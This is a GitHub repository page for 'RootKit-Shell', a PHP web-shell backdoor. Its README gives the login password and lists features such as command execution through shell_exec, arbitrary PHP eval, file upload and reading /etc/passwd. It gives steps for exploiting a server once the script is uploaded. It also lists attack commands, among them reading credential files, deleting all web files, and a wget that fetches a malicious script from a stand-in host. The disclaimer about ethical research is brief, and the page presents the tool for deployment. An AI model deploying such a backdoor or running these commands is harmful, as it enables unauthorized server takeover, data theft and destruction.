Skip to content

This article analyzes the PHP RootKit Backdoor, explaining its features like password-protected access, command execution, file management, and PHP code execution. Learn about the security risks associated with such scripts and how ethical hackers and security researchers study them to enhance web security.

License

Notifications You must be signed in to change notification settings

RootShelll/RootKit-Shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

PHP RootKit Backdoor – Features & Security Risks

RootKit-Shell Backdoor

Password:

R00t

Overview

This PHP backdoor script provides full control over a web server once deployed. It is a malicious tool that allows unauthorized access and remote command execution.

Features & Functions:

  • Password-Protected Access: Requires a predefined password for login.
  • File Manager: View, create, edit, and delete files.
  • Command Execution: Run system commands using shell_exec().
  • PHP Code Execution: Execute arbitrary PHP scripts via eval().
  • File Upload: Upload files to the server.
  • Sensitive File Access: Read system files like /etc/passwd.

Usage (Theoretical)

Once uploaded to a server, this script can be accessed via a browser:

  1. Navigate to the script URL.
  2. Enter the password to gain access.
  3. Execute commands, manage files, and exploit the server.

Example Commands:

ls -la  # List directory contents
cat /etc/passwd  # View system user accounts
rm -rf /var/www/html/*  # Delete all web files (dangerous)
wget http://malicious.com/malware.php -O /tmp/m.php  # Download a malicious script
php -r "system('whoami');"  # Check user permissions

Warning & Ethical Considerations

Using such scripts for unauthorized access is illegal. Ethical hackers and security researchers analyze these abilities to strengthen web security. If found on a system, remove it immediately and implement stronger security measures.

About

This article analyzes the PHP RootKit Backdoor, explaining its features like password-protected access, command execution, file management, and PHP code execution. Learn about the security risks associated with such scripts and how ethical hackers and security researchers study them to enhance web security.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages